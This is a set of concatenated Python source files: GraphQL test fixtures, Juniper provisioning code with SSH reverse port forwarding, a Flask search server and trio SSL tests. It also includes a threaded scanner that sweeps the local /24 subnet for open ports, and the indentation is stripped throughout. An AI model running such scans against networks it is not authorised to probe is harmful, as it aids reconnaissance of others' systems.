check_file_exists = hge_ctx.backend == backend
# setting the default metadata API version to v1
setup_metadata_api_version = getattr(request.cls, 'setup_metadata_api_version',"v1")
if hge_ctx.is_default_backend:
if setup_metadata_api_version == "v1":
# setup the metadata and DB schema using the `/v1/query` endpoint
db_context = db_context_with_schema_common(
request, hge_ctx, 'setup_files', 'setup.yaml', 'teardown_files',
'teardown.yaml', check_file_exists )
elif setup_metadata_api_version == "v2":
# setup the metadata using the "/v1/metadata" and the DB schema using the `/v2/query` endpoints
db_context = db_context_with_schema_common_new (
request, hge_ctx, 'setup_files', setup, 'teardown_files',
teardown, schema_setup, schema_teardown, pre_setup, post_teardown, check_file_exists
)
else:
# setup the metadata using the "/v1/metadata" and the DB schema using the `/v2/query` endpoints
db_context = db_context_with_schema_common_new (
request, hge_ctx, 'setup_files', setup, 'teardown_files',
teardown, schema_setup, schema_teardown, pre_setup, post_teardown, check_file_exists
)
yield from db_context
def db_state_context_new(
request, hge_ctx, setup='setup.yaml', teardown='teardown.yaml',
schema_setup='schema_setup.yaml', schema_teardown='schema_teardown.yaml',
pre_setup='pre_setup.yaml', post_teardown='post_teardown.yaml'):
yield from db_context_with_schema_common_new (
request, hge_ctx, 'setup_files', setup, 'teardown_files',
teardown, schema_setup, schema_teardown, pre_setup, post_teardown, True
)
def db_context_with_schema_common(
request, hge_ctx, setup_files_attr, setup_default_file,
teardown_files_attr, teardown_default_file, check_file_exists=True):
(skip_setup, skip_teardown) = [
request.config.getoption('--' + x)
for x in ['skip-schema-setup', 'skip-schema-teardown']
]
yield from db_context_common(
request, hge_ctx, setup_files_attr, setup_default_file,
teardown_files_attr, teardown_default_file,
check_file_exists, skip_setup, skip_teardown
)
def db_context_with_schema_common_new (
request, hge_ctx, setup_files_attr, setup_default_file,
teardown_files_attr, teardown_default_file, setup_sql_file, teardown_sql_file, pre_setup_file, post_teardown_file, check_file_exists=True):
(skip_setup, skip_teardown) = [
request.config.getoption('--' + x)
for x in ['skip-schema-setup', 'skip-schema-teardown']
]
yield from db_context_common_new (
request, hge_ctx, setup_files_attr, setup_default_file, setup_sql_file,
teardown_files_attr, teardown_default_file, teardown_sql_file,
pre_setup_file, post_teardown_file,
check_file_exists, skip_setup, skip_teardown
)
def db_context_common(
request, hge_ctx, setup_files_attr, setup_default_file,
teardown_files_attr, teardown_default_file,
check_file_exists=True, skip_setup=True, skip_teardown=True ):
def get_files(attr, default_file):
files = getattr(request.cls, attr, None)
if not files:
files = os.path.join(request.cls.dir(), default_file)
return files
setup = get_files(setup_files_attr, setup_default_file)
teardown = get_files(teardown_files_attr, teardown_default_file)
if hge_ctx.is_default_backend:
yield from setup_and_teardown_v1q(request, hge_ctx, setup, teardown, check_file_exists, skip_setup, skip_teardown)
else:
yield from setup_and_teardown_v2q(request, hge_ctx, setup, teardown, check_file_exists, skip_setup, skip_teardown)
def db_context_common_new(
request, hge_ctx, setup_files_attr, setup_default_file,
setup_default_sql_file,
teardown_files_attr, teardown_default_file, teardown_default_sql_file,
pre_setup_file, post_teardown_file,
check_file_exists=True, skip_setup=True, skip_teardown=True ):
def get_files(attr, default_file):
files = getattr(request.cls, attr, None)
if not files:
files = os.path.join(request.cls.dir(), default_file)
return files
setup = get_files(setup_files_attr, setup_default_file)
teardown = get_files(teardown_files_attr, teardown_default_file)
setup_default_sql_file = os.path.join(request.cls.dir(), setup_default_sql_file)
teardown_default_sql_file = os.path.join(request.cls.dir(), teardown_default_sql_file)
pre_setup_default_file = os.path.join(request.cls.dir(), pre_setup_file)
post_teardown_default_file = os.path.join(request.cls.dir(), post_teardown_file)
yield from setup_and_teardown( request, hge_ctx, setup, teardown,
setup_default_sql_file, teardown_default_sql_file, pre_setup_default_file, post_teardown_default_file,
check_file_exists, skip_setup, skip_teardown)
def setup_and_teardown_v1q(request, hge_ctx, setup_files, teardown_files, check_file_exists=True, skip_setup=False, skip_teardown=False):
def assert_file_exists(f):
assert os.path.isfile(f), 'Could not find file ' + f
if check_file_exists:
for o in [setup_files, teardown_files]:
run_on_elem_or_list(assert_file_exists, o)
def v1q_f(f):
if os.path.isfile(f):
st_code, resp = hge_ctx.v1q_f(f)
assert st_code == 200, resp
if not skip_setup:
run_on_elem_or_list(v1q_f, setup_files)
yield
# Teardown anyway if any of the tests have failed
if request.session.testsfailed > 0 or not skip_teardown:
run_on_elem_or_list(v1q_f, teardown_files)
def setup_and_teardown_v2q(request, hge_ctx, setup_files, teardown_files, check_file_exists=True, skip_setup=False, skip_teardown=False):
def assert_file_exists(f):
assert os.path.isfile(f), 'Could not find file ' + f
if check_file_exists:
for o in [setup_files, teardown_files]:
run_on_elem_or_list(assert_file_exists, o)
def v2q_f(f):
if os.path.isfile(f):
st_code, resp = hge_ctx.v2q_f(f)
assert st_code == 200, resp
if not skip_setup:
run_on_elem_or_list(v2q_f, setup_files)
yield
# Teardown anyway if any of the tests have failed
if request.session.testsfailed > 0 or not skip_teardown:
run_on_elem_or_list(v2q_f, teardown_files)
def setup_and_teardown(request, hge_ctx, setup_files, teardown_files,
sql_schema_setup_file,sql_schema_teardown_file,
pre_setup_file, post_teardown_file,
check_file_exists=True, skip_setup=False, skip_teardown=False):
def assert_file_exists(f):
assert os.path.isfile(f), 'Could not find file ' + f
if check_file_exists:
for o in [setup_files, teardown_files, sql_schema_setup_file, sql_schema_teardown_file]:
run_on_elem_or_list(assert_file_exists, o)
def v2q_f(f):
if os.path.isfile(f):
st_code, resp = hge_ctx.v2q_f(f)
if st_code != 200:
run_on_elem_or_list(pre_post_metadataq_f, post_teardown_file)
assert_response_code('/v2/query', f, st_code, 200, resp)
def metadataq_f(f):
if os.path.isfile(f):
st_code, resp = hge_ctx.v1metadataq_f(f)
if st_code != 200:
# drop the sql setup, if the metadata calls fail
run_on_elem_or_list(v2q_f, sql_schema_teardown_file)
run_on_elem_or_list(pre_post_metadataq_f, post_teardown_file)
assert_response_code('/v1/metadata', f, st_code, 200, resp)
def pre_post_metadataq_f(f):
if os.path.isfile(f):
st_code, resp = hge_ctx.v1metadataq_f(f)
assert_response_code('/v1/metadata', f, st_code, 200, resp)
if not skip_setup:
run_on_elem_or_list(pre_post_metadataq_f, pre_setup_file)
run_on_elem_or_list(v2q_f, sql_schema_setup_file)
run_on_elem_or_list(metadataq_f, setup_files)
yield
# Teardown anyway if any of the tests have failed
if request.session.testsfailed > 0 or not skip_teardown:
run_on_elem_or_list(metadataq_f, teardown_files)
run_on_elem_or_list(v2q_f, sql_schema_teardown_file)
run_on_elem_or_list(pre_post_metadataq_f, post_teardown_file)
def run_on_elem_or_list(f, x):
if isinstance(x, str):
return [f(x)]
elif isinstance(x, list):
return [f(e) for e in x]
def is_help_option_present(config):
return any([
config.getoption(x)
for x in ['--fixtures','--help', '--collect-only']
])
def is_master(config):
"""True if the code running the given pytest.config object is running in a xdist master
node or not running xdist at all.
"""
return not hasattr(config, 'workerinput')
|
tasktools.py
|
# DO NOT ALTER OR REMOVE COPYRIGHT NOTICES OR THIS FILE HEADER
# Copyright (c) 2018 Juniper Networks, Inc.
# All rights reserved.
# Use is subject to license terms.
#
# Author: cklewar
import datetime
import os
import re
import select
import socket
import threading
import lib.constants as c
from jnpr.junos.exception import *
from paramiko.ssh_exception import SSHException
from lib.logmsg import LogTaskTools as logmsg
from lib.tools import Tools
from pathlib2 import Path
class SSHPortForward(object):
def __init__(self, sample_device=None, grp_cfg=None, event=None, cancel_chan=None):
self.logger = c.logger
self.sample_device = sample_device
self.grp_cfg = grp_cfg
self.event = event
self.cancel_chan = cancel_chan
self.logger.info(Tools.create_log_msg(logmsg.SSHFWD, sample_device.deviceSerial,
logmsg.SSHFWD_INIT.format(self.sample_device.deviceIP,
grp_cfg.TASKS.Provision.Cert.LocalFwdPort,
grp_cfg.TASKS.Provision.Cert.RemoteFwdHost,
grp_cfg.TASKS.Provision.Cert.RemoteFwdHostPort)))
def init_port_fwd(self):
if self.sample_device.deviceConnection.connected:
self.reverse_forward_tunnel(int(self.grp_cfg.TASKS.Provision.Cert.LocalFwdPort),
self.grp_cfg.TASKS.Provision.Cert.RemoteFwdHost,
int(self.grp_cfg.TASKS.Provision.Cert.RemoteFwdHostPort),
self.sample_device.deviceConnection._conn._session.transport, self.event,
self.cancel_chan)
else:
self.logger.info(
Tools.create_log_msg(logmsg.SSHFWD, self.sample_device.deviceSerial, logmsg.SSHFWD_CONN_NOK))
return False
def reverse_forward_tunnel(self, server_port, remote_host, remote_port, transport, event, cancel_chan):
try:
transport.request_port_forward(address='', port=server_port, )
except SSHException as err:
self.logger.info(Tools.create_log_msg(logmsg.SSHFWD, self.sample_device.deviceSerial,
logmsg.SSHFWD_INIT_FAILURE.format(err.message)))
return False, logmsg.SSHFWD_INIT_FAILURE.format(err.message)
event.set()
while True:
chan = transport.accept(1)
if cancel_chan.is_cancelled:
break
elif chan is None:
continue
thr = threading.Thread(target=self.handler, args=(chan, remote_host, remote_port,))
thr.setDaemon(True)
thr.start()
def handler(self, chan, host, port):
sock = socket.socket()
try:
sock.connect((host, port))
except Exception as e:
self.logger.info(Tools.create_log_msg(logmsg.SSHFWD, self.sample_device.deviceSerial,
logmsg.SSHFWD_REQ_FAILED.format(host, port, e)))
return
self.logger.info(Tools.create_log_msg(logmsg.SSHFWD, self.sample_device.deviceSerial,
logmsg.SSHFWD_REQ_CONNECTED.format(chan.origin_addr, chan.getpeername(),
(host, port))))
while True:
r, w, x = select.select([sock, chan], [], [])
if sock in r:
data = sock.recv(1024)
if len(data) == 0:
break
chan.send(data)
if chan in r:
data = chan.recv(1024)
if len(data) == 0:
break
sock.send(data)
chan.close()
sock.close()
self.logger.info(Tools.create_log_msg(logmsg.SSHFWD, self.sample_device.deviceSerial,
logmsg.SSHFWD_REQ_CLOSED.format(chan.origin_addr)))
class ChannelCancellation(object):
def __init__(self):
self.is_cancelled = False
def cancel(self):
self.is_cancelled = True
class Configuration:
def __init__(self):
self.logger = c.logger
def prepare_device_config(self, sample_device=None):
version = sample_device.softwareVersion
now = datetime.datetime.now().strftime('%Y-%m-%d-%H%M')
grp_cfg = Tools.create_config_view(config_type=c.CONFIG_TYPE_GROUP, stream=sample_device.deviceGroupData)
if c.SERVICEPLUGIN_OSSH in sample_device.deviceServicePlugin:
sample_device.deviceConfigData['device']['ossh_secret'] = sample_device.deviceConfigData['device'][
'ossh_secret']
sample_device.deviceConfigData['device']['ossh_ip'] = c.conf.SERVICES.Ossh.ServiceBindAddress
sample_device.deviceConfigData['device']['ossh_port'] = c.conf.SERVICES.Ossh.ServiceListenPort
if sample_device.deviceConfigData:
heading = "## Last changed: " + now + "\n"
heading += "version " + version + ";"
sample_device.deviceConfigData['heading'] = heading
status, data = Tools.get_config(lookup_type=c.CONFIG_LOOKUP_TYPE_GET_TEMPLATE,
sample_device=sample_device)
if status:
config = data.render(sample_device.deviceConfigData)
sample_device.deviceConfiguration = config
_device_config_file = '{0}-{1}.conf'.format(sample_device.deviceSerial, now)
target = open(grp_cfg.TASKS.Provision.Configuration.ConfigFileHistory + _device_config_file, 'w')
target.write(sample_device.deviceConfiguration)
target.close()
return {'status': True, 'sample_device': sample_device, 'configfilename': _device_config_file}
else:
return {'status': False, 'sample_device': sample_device, 'configfilename': data}
else:
self.logger.info(Tools.create_log_msg(logmsg.CONF_DEV_CFG, sample_device.deviceSerial,
logmsg.CONF_DEV_CFG_DEV_DATA_ERROR))
return None
def prepare_vnf_boostrap_config(self, serialnumber=None, grp_cfg=None, vnf_type=None):
now = datetime.datetime.now().strftime('%Y-%m-%d-%H%M')
status, data = Tools.get_config(lookup_type=c.CONFIG_LOOKUP_TYPE_GET_DEVICE_CFG,
serialnumber=None, deviceOsshId=serialnumber)
if status:
if vnf_type == c.VNF_TYPE_JUNIPER:
data['device']['ossh_secret'] = data['device']['ossh_secret']
data['device']['ossh_ip'] = c.conf.SERVICES.Ossh.ServiceBindAddress
data['device']['ossh_port'] = c.conf.SERVICES.Ossh.ServiceListenPort
heading = "## Last changed: " + now + "\n"
data['heading'] = heading
status, template = Tools.get_config(lookup_type=c.CONFIG_LOOKUP_TYPE_GET_TEMPLATE,
serialnumber=None,
deviceOsshId=serialnumber,
path=data['yapt']['bootstrap_template_dir'],
file=data['yapt']['bootstrap_template_file'])
if status:
config = template.render(data, deviceId=serialnumber)
_device_config_file = '{0}-bootstrap-{1}.conf'.format(serialnumber, now)
target = open(grp_cfg.TASKS.Provision.Configuration.ConfigFileHistory + _device_config_file, 'w')
target.write(config)
target.close()
return _device_config_file
else:
self.logger.info(Tools.create_log_msg(logmsg.CONF_DEV_CFG, serialnumber,
logmsg.CONF_DEV_CFG_DEV_DATA_ERROR))
return None
class Software:
def __init__(self):
pass
@classmethod
def get_software_image_name(cls, sample_device, target_version, grp_cfg):
"""
Read the file names stored under the local images directory, extract the version label and compare it with the target image version.
- return the local filename if a matching image exists
- return False if it does not
:param sample_device:
:param target_version:
:param grp_cfg:
:return: filename or False
"""
Tools.emit_log(task_name='SOFTWARE', sample_device=sample_device,
message=logmsg.SW_CHECK_DIR.format(target_version))
_filename = Path("{0}/{1}.tgz".format(grp_cfg.TASKS.Provision.Software.ImageDir, target_version))
if _filename.is_file():
Tools.emit_log(task_name='SOFTWARE', sample_device=sample_device,
message=logmsg.SW_IMAGE_OK.format(target_version))
return "{0}.tgz".format(target_version)
else:
Tools.emit_log(task_name='SOFTWARE', sample_device=sample_device,
message=logmsg.SW_IMAGE_NOK.format(target_version))
return False
#f = False
#for filename in os.listdir(grp_cfg.TASKS.Provision.Software.ImageDir):
# if filename.endswith(".tgz"):
#local_version = re.findall(r"(?:[\d.X]+)(?:\-*)(?:[D\d.]+)", filename)[0]
# local_version = ''.format()
# if target_version == local_version:
# Tools.emit_log(task_name='SOFTWARE', sample_device=sample_device,
# message=logmsg.SW_IMAGE_OK.format(local_version))
# f = filename
# break
# else:
# pass
#if not f:
# if no file found, return False
# Tools.emit_log(task_name='SOFTWARE', sample_device=sample_device,
# message=logmsg.SW_IMAGE_NOK.format(target_version))
#return f
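# Usage sketch (hypothetical target version, for illustration only): returns
# '18.2R1-S3.tgz' if that file exists under
# grp_cfg.TASKS.Provision.Software.ImageDir, otherwise False.
#
#     image = Software.get_software_image_name(sample_device, '18.2R1-S3', grp_cfg)
#     if image:
#         ...  # hand the image name to the provisioning task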
@classmethod
def compare_device_vers_with_target_vers(cls, device_version, target_version):
"""
Compare device_version to target_version
:param device_version: version currently installed on the device
:param target_version: target version which should be installed on the device
:return: 0 -> nothing to do, versions are identical;
         1 -> nothing to do, the version installed on the device is newer;
         -1 -> update the image, the version installed on the device is older.
         If every compared digit matches up to the length of the shorter version list,
         the versions are treated as identical (they only differ in length).
"""
device_version = re.findall(r"(\d+)", device_version)
target_version = re.findall(r"(\d+)", target_version)
if device_version == target_version:
return 0
count = min(len(device_version), len(target_version))
for x in range(count):
if int(device_version[x]) > int(target_version[x]):
return 1
elif int(device_version[x]) < int(target_version[x]):
return -1
return 0
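# Usage sketch (hypothetical Junos-style version strings, added for
# illustration only):
#
#     >>> Software.compare_device_vers_with_target_vers('15.1X49-D45', '15.1X49-D45')
#     0
#     >>> Software.compare_device_vers_with_target_vers('17.3R1', '15.1X49-D45')
#     1
#     >>> Software.compare_device_vers_with_target_vers('15.1X49-D45', '15.1X49-D100')
#     -1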
class Vnf(object):
def __init__(self):
self.logger = c.logger
def mkdir_p(self, sftp, remote_directory):
if remote_directory == '/':
sftp.chdir('/')
return
if remote_directory == '':
return
try:
sftp.chdir(remote_directory)
except IOError:
dirname, basename = os.path.split(remote_directory.rstrip('/'))
Vnf.mkdir_p(self, sftp, dirname)
sftp.mkdir(basename)
sftp.chdir(basename)
return True
|
index.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
The web server to handle requests from the clients to search queries
and handle requests for crawling new web pages. The server runs on the
python web-server framework called Flask. Incoming client requests are
handled and tasks are added to Redis task queues for processing.
"""
__author__ = "Anthony Sigogne"
__copyright__ = "Copyright 2017, Byprog"
__email__ = "anthony@byprog.com"
__license__ = "MIT"
__version__ = "1.0"
import re
import os
import url
import crawler
import requests
import json
import query
from flask import Flask, request, jsonify
from language import languages
from redis import Redis
from rq import Queue
from multiprocessing import Process
from multiprocessing import Queue as Q
from twisted.internet import reactor
from rq.decorators import job
from scrapy.crawler import CrawlerRunner
from urllib.parse import urlparse
from datetime import datetime
from elasticsearch import Elasticsearch
from flask_rq2 import RQ
import logging
#Initialize the flask application
app = Flask(__name__)
with app.app_context():
from helper import *
"""
__author__ : Bijin Benny
__email__ : bijin@ualberta.ca
__license__ : MIT
__version__ : 1.0
Modification : The native Redis library used in the original reference is
outdated and is modified to use the new redis library specific
to Flask apps
Configure and initialize the Redis task queue
"""
app.config['RQ_REDIS_URL']='redis://localhost:6379/0'
redis_conn = RQ(app)
"""
__author__ : Bijin Benny
__email__ : bijin@ualberta.ca
__license__ : MIT
__version__ : 1.0
Modification : The deprecated elasticsearch library elasticsearch_dsl is
removed and replaced with the new elasticsearch library for
ES clients
Load environment variables and create elastic search DB client
"""
host = os.getenv("HOST")
user = os.getenv("USERNAME")
pwd = os.getenv("PASSWORD")
port = os.getenv("PORT")
es = Elasticsearch(hosts="http://"+user+":"+pwd+"@"+host+":"+port+"/")
"""
__author__ : Bijin Benny
__email__ : bijin@ualberta.ca
__license__ : MIT
__version__ : 1.0
Modification : Logging framework is added to the code to enable better debugging
through logs
Set logging information
"""
logging.basicConfig(filename=datetime.now().strftime('server_%d_%m_%Y.log'),
level=logging.DEBUG,format='%(asctime)s %(levelname)-8s %(message)s')
logging.info(es.info())
"""
__author__ : Bijin Benny
__email__ : bijin@ualberta.ca
__license__ : MIT
__version__ : 1.0
Modification : The DB mapping/schema used in the original code is specific to
the application the code was used for and needs to be modified
to store information specific to the project experiment
Database schema used to create the DB index if the server is running for
the first time. Ignores the schema if the index already exists.
"""
settings = {
"settings": {
"number_of_shards": 1,
"number_of_replicas": 0
},
"mappings": {
"properties": {
"url": {
"type": "keyword"
},
"domain":{
"type": "keyword"
},
"title":{
"type": "text",
"analyzer": "english"
},
"description":{
"type": "text",
"analyzer": "english"
},
"body":{
"type": "text",
"analyzer": "english"
},
"weight":{
"type": "long"
},
"bert_vector":{
"type": "dense_vector",
"dims": 768
},
"laser_vector":{
"type": "dense_vector",
"dims": 1024
}
}
}
}
es.indices.create(index='web-en',ignore=400,body=settings)
"""
Server endpoint for crawl requests. Crawl requests with a list of urls
to crawl are handled by this handler.
URL : /explore
Method : HTTP POST
POST Data : url - list of urls to explore
Returns success or error message depending on the task being processed
in the Redis queue.
"""
@app.route("/explore", methods=['POST'])
def explore():
data = dict((key, request.form.get(key)) for key in request.form.keys())
if "url" not in data :
raise InvalidUsage('No url specified in POST data')
logging.info("launch exploration job")
job = explore_job.queue(data["url"])
job.perform()
return "Exploration started"
@redis_conn.job('low')
def explore_job(link) :
"""
Explore a website and index all urls (redis-rq process).
"""
logging.info("explore website at : %s"%link)
try :
link = url.crawl(link).url
except :
return 0
def f(q):
try:
"""
__author__ : Bijin Benny
__email__ : bijin@ualberta.ca
__license__ : MIT
__version__ : 1.0
Modification : The original code used CrawlerProcess class from
scrapy library to crawl web pages. However, CrawlerProcess class could
not run parallely in Redis tasks threads. CrawlerProcess was replaced by
CrawlerRunner class that could run parallely in multiple Redis tasks
"""
runner = CrawlerRunner({
'USER_AGENT': "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 \
(KHTML, like Gecko) Chrome/55.0.2883.75 Safari/537.36",
'DOWNLOAD_TIMEOUT':100,
'DOWNLOAD_DELAY':0.25,
'ROBOTSTXT_OBEY':True,
'HTTPCACHE_ENABLED':False,
'REDIRECT_ENABLED':False,
'SPIDER_MIDDLEWARES' : {
'scrapy.downloadermiddlewares.robotstxt.RobotsTxtMiddleware':True,
'scrapy.spidermiddlewares.httperror.HttpErrorMiddleware':True,
'scrapy.downloadermiddlewares.httpcache.HttpCacheMiddleware':True,
'scrapy.extensions.closespider.CloseSpider':True
},
'CLOSESPIDER_PAGECOUNT':500 #only for debug
})
runner.crawl(crawler.Crawler, allowed_domains=[urlparse(link).netloc],
start_urls = [link,], es_client=es, redis_conn=redis_conn)
d = runner.join()
d.addBoth(lambda _: reactor.stop())
reactor.run()
q.put(None)
except Exception as e:
q.put(e)
q = Q()
p = Process(target=f, args=(q,))
p.start()
result = q.get()
p.join()
if result is not None:
raise result
return 1
"""
Server endpoint to handle search queries from the web-client.
Forwards the query to the Elasticsearch DB and returns the top
relevant results.
URL : /search
Method : HTTP POST
POST Data : query - The search query
hits - The number of results to be returned
start - Start number for the hits (for pagination purpose)
"""
@app.route("/search", methods=['POST'])
def search():
def format_result(hit, highlight) :
#Highlight title and description
title = hit["title"]
description = hit["description"]
if highlight :
if "description" in highlight :
description = highlight["description"][0]+"..."
elif "body" in highlight :
description = highlight["body"][0]+"..."
#Create false title and description for better user experience
if not title :
title = hit["domain"]
if not description :
description = url.create_description(hit["body"])+"..."
return {
"title":title,
"description":description,
"url":hit["url"],
"thumbnail":hit.get("thumbnail", None)
}
#Analyze and validate the user query
data = dict((key, request.form.get(key)) for key in request.form.keys())
logging.info("[search request data : "+ str(data))
if "query" not in data :
raise InvalidUsage('No query specified in POST data')
start = int(data.get("start", "0"))
hits = int(data.get("hits", "10"))
if start < 0 or hits < 0 :
raise InvalidUsage('Start or hits cannot be negative numbers')
groups = re.search("(site:(?P<domain>[^ ]+))?( ?(?P<query>.*))?",
data["query"]).groupdict()
logging.info("Expression query : " + str(groups["query"]))
"""
__author__ : Bijin Benny
__email__ : bijin@ualberta.ca
__license__ : MIT
__version__ : 1.0
Modification : The referenced code included searching web pages
based on their domains as well as search queries. Domain search was irrelevant
to the experiment use case and the code is modified to perform only query search
Send search request to Elastic search DB with the user query
"""
response = es.search(index="web-en",body=query.expression_query(groups["query"]))
logging.info("Raw response" + str(response))
results = []
#Process, sort and return the results back to the user
for domain_bucket in response['aggregations']['per_domain']['buckets']:
for hit in domain_bucket["top_results"]["hits"]["hits"] :
results.append((format_result(hit["_source"],
hit.get("highlight", None)),hit["_score"]))
logging.info("Before Sort Results :" + str(results))
results = [result[0] for result in
           sorted(results, key=lambda result: result[1], reverse=True)]
logging.info("After Sort Results :" + str(results))
total = len(results)
results = results[start:start+hits]
logging.info("Total results : "+ str(total))
return jsonify(total=total, results=results)
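# Usage sketch (illustration only, not part of the original code): a client
# query against /search. "hits" and "start" are optional and default to 10 and
# 0 in the handler above; the host and port are assumptions.
#
#     import requests
#     resp = requests.post("http://localhost:5000/search",
#                          data={"query": "climate change", "hits": 5, "start": 0})
#     for hit in resp.json()["results"]:
#         print(hit["title"], hit["url"])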
|
__init__.py
|
import netifaces
import socket
import time
import threading
def Get_IP():
ips = {"ext": [], "local": []}
for inface in netifaces.interfaces():
try:
ip = netifaces.ifaddresses(inface)[netifaces.AF_INET][0]['addr']
if "127" == ip[:3]:
ips['local'].append(ip)
elif "169" == ip[:3]:
ips['local'].append(ip)
else:
ips['ext'].append(ip)
except:
pass
return ips
def Get_All_IP_Stat():
ips = {"ext": [], "local": []}
for inface in netifaces.interfaces():
try:
ip = netifaces.ifaddresses(inface)[netifaces.AF_INET][0]
ip['mac'] = IP_to_MAC(ip['addr'])
if "127" == ip['addr'][:3]:
ips['local'].append(ip)
elif "169" == ip['addr'][:3]:
ips['local'].append(ip)
else:
ips['ext'].append(ip)
except:
pass
return ips
def Get_IP_with_MAC():
ips = {"ext": [], "local": []}
for inface in netifaces.interfaces():
try:
ip = netifaces.ifaddresses(inface)[netifaces.AF_INET][0]['addr']
if "127" == ip[:3]:
ips['local'].append({"ip": ip, "mac": IP_to_MAC(ip)})
elif "169" == ip[:3]:
ips['local'].append({"ip": ip, "mac": IP_to_MAC(ip)})
else:
ips['ext'].append({"ip": ip, "mac": IP_to_MAC(ip)})
except:
pass
return ips
def IP_to_MAC(ip):
for i in netifaces.interfaces():
addrs = netifaces.ifaddresses(i)
try:
if_mac = addrs[netifaces.AF_LINK][0]['addr']
if_ip = addrs[netifaces.AF_INET][0]['addr']
except:
if_mac = if_ip = None
if if_ip == ip:
return if_mac
return None
def Get_GW():
gateways = netifaces.gateways()
return gateways['default'][netifaces.AF_INET][0]
class Device(object):
def __init__(self, ip):
self.ip = ip
self.Mk_Device = False
self.Mk_Data = {}
self.Mk_Type = False
self.ports = []
self.hostname = None
@property
def rtsp(self):
return 554 in self.ports
@property
def http(self):
return 80 in self.ports
@property
def json(self):
data = {"ip": self.ip, "ports": self.ports, "hostname": self.hostname}
if self.Mk_Device:
data['mk_device'] = self.Mk_Data
return data
class Devices(object):
def __init__(self):
self.All = {}
@property
def json(self):
data = {}
for item in self.All:
data[self.All[item].ip] = self.All[item].json  # key each entry by the device's IP address
return data
class Port_Scanner(object):
def __init__(self, check_ports):
self.GW = Get_GW()
self.IP = Get_IP()
self.check_ports = check_ports
self.base = ".".join(self.GW.split(".")[:3]) + "."
self.running = 0
self.Devices = Devices()
def Collect(self):
time.sleep(2)
self.Devices = Devices()
self.counted = 0
for port in self.check_ports:
start = 0
for i in range(1, 6):
threading.Thread(target=self.__ripper__, args=[start, i*52, port]).start()
self.running += 1
start += 52
while self.running > 0:
print("[ DDS ] - Device Discovery Scan. Addresses Scanned:", self.counted, end="\r")
time.sleep(0.01)
print("[ DDS ] - Device Discovery Scan. Addresses Scanned:", self.counted)
return self.Devices
def __ripper__(self, start, end, port):
while start <= end:
try:
rmIP = self.base + str(start)
self.counted += 1
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(0.1)
sock.connect((rmIP, port))
time.sleep(0.2)
if rmIP not in self.Devices.All:
device = Device(rmIP)
self.Devices.All[rmIP] = device
#self.Devices.All[rmIP].hostname = hostname TODO Implement this
self.Devices.All[rmIP].ports.append(port)
except KeyboardInterrupt:
print("[ UKI ] - User Keyboard Interupt")
exit()
except TimeoutError:
pass
except Exception as e:
#print(e)
pass
start += 1
self.running -= 1
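# Usage sketch (assumed ports, illustration only): scan the local /24 derived
# from the default gateway for hosts exposing HTTP or RTSP.
#
#     scanner = Port_Scanner(check_ports=[80, 554])
#     devices = scanner.Collect()
#     print(devices.json)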
|
test_ssl.py
|
import pytest
import threading
import socket as stdlib_socket
import ssl
from contextlib import contextmanager
from functools import partial
from OpenSSL import SSL
import trustme
from async_generator import async_generator, yield_, asynccontextmanager
import trio
from .. import _core
from .._highlevel_socket import SocketStream, SocketListener
from .._highlevel_generic import aclose_forcefully
from .._core import ClosedResourceError, BrokenResourceError
from .._highlevel_open_tcp_stream import open_tcp_stream
from .. import socket as tsocket
from .._ssl import SSLStream, SSLListener, NeedHandshakeError
from .._util import ConflictDetector
from .._core.tests.tutil import slow
from ..testing import (
assert_checkpoints,
Sequencer,
memory_stream_pair,
lockstep_stream_pair,
check_two_way_stream,
)
# We have two different kinds of echo server fixtures we use for testing. The
# first is a real server written using the stdlib ssl module and blocking
# sockets. It runs in a thread and we talk to it over a real socketpair(), to
# validate interoperability in a semi-realistic setting.
#
# The second is a very weird virtual echo server that lives inside a custom
# Stream class. It lives entirely inside the Python object space; there are no
# operating system calls in it at all. No threads, no I/O, nothing. It's
# 'send_all' call takes encrypted data from a client and feeds it directly into
# the server-side TLS state engine to decrypt, then takes that data, feeds it
# back through to get the encrypted response, and returns it from 'receive_some'. This
# gives us full control and reproducibility. This server is written using
# PyOpenSSL, so that we can trigger renegotiations on demand. It also allows
# us to insert random (virtual) delays, to really exercise all the weird paths
# in SSLStream's state engine.
#
# Both present a certificate for "trio-test-1.example.org".
TRIO_TEST_CA = trustme.CA()
TRIO_TEST_1_CERT = TRIO_TEST_CA.issue_server_cert("trio-test-1.example.org")
SERVER_CTX = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
TRIO_TEST_1_CERT.configure_cert(SERVER_CTX)
CLIENT_CTX = ssl.create_default_context()
TRIO_TEST_CA.configure_trust(CLIENT_CTX)
# Temporarily disable TLSv1.3, until the issue with openssl's session
# ticket handling is sorted out one way or another:
# https://github.com/python-trio/trio/issues/819
# https://github.com/openssl/openssl/issues/7948
# https://github.com/openssl/openssl/issues/7967
if hasattr(ssl, "OP_NO_TLSv1_3"):
CLIENT_CTX.options |= ssl.OP_NO_TLSv1_3
# The blocking socket server.
def ssl_echo_serve_sync(sock, *, expect_fail=False):
try:
wrapped = SERVER_CTX.wrap_socket(
sock, server_side=True, suppress_ragged_eofs=False
)
wrapped.do_handshake()
while True:
data = wrapped.recv(4096)
if not data:
# other side has initiated a graceful shutdown; we try to
# respond in kind but it's legal for them to have already gone
# away.
exceptions = (BrokenPipeError, ssl.SSLZeroReturnError)
# Under unclear conditions, CPython sometimes raises
# SSLWantWriteError here. This is a bug (bpo-32219), but it's
# not our bug, so ignore it.
exceptions += (ssl.SSLWantWriteError,)
try:
wrapped.unwrap()
except exceptions:
pass
return
wrapped.sendall(data)
except Exception as exc:
if expect_fail:
print("ssl_echo_serve_sync got error as expected:", exc)
else: # pragma: no cover
print("ssl_echo_serve_sync got unexpected error:", exc)
raise
else:
if expect_fail: # pragma: no cover
raise RuntimeError("failed to fail?")
# Fixture that gives a raw socket connected to a trio-test-1 echo server
# (running in a thread). Useful for testing making connections with different
# SSLContexts.
@asynccontextmanager
@async_generator
async def ssl_echo_server_raw(**kwargs):
a, b = stdlib_socket.socketpair()
async with trio.open_nursery() as nursery:
# Exiting the 'with a, b' context manager closes the sockets, which
# causes the thread to exit (possibly with an error), which allows the
# nursery context manager to exit too.
with a, b:
nursery.start_soon(
trio.to_thread.run_sync,
partial(ssl_echo_serve_sync, b, **kwargs)
)
await yield_(SocketStream(tsocket.from_stdlib_socket(a)))
# Fixture that gives a properly set up SSLStream connected to a trio-test-1
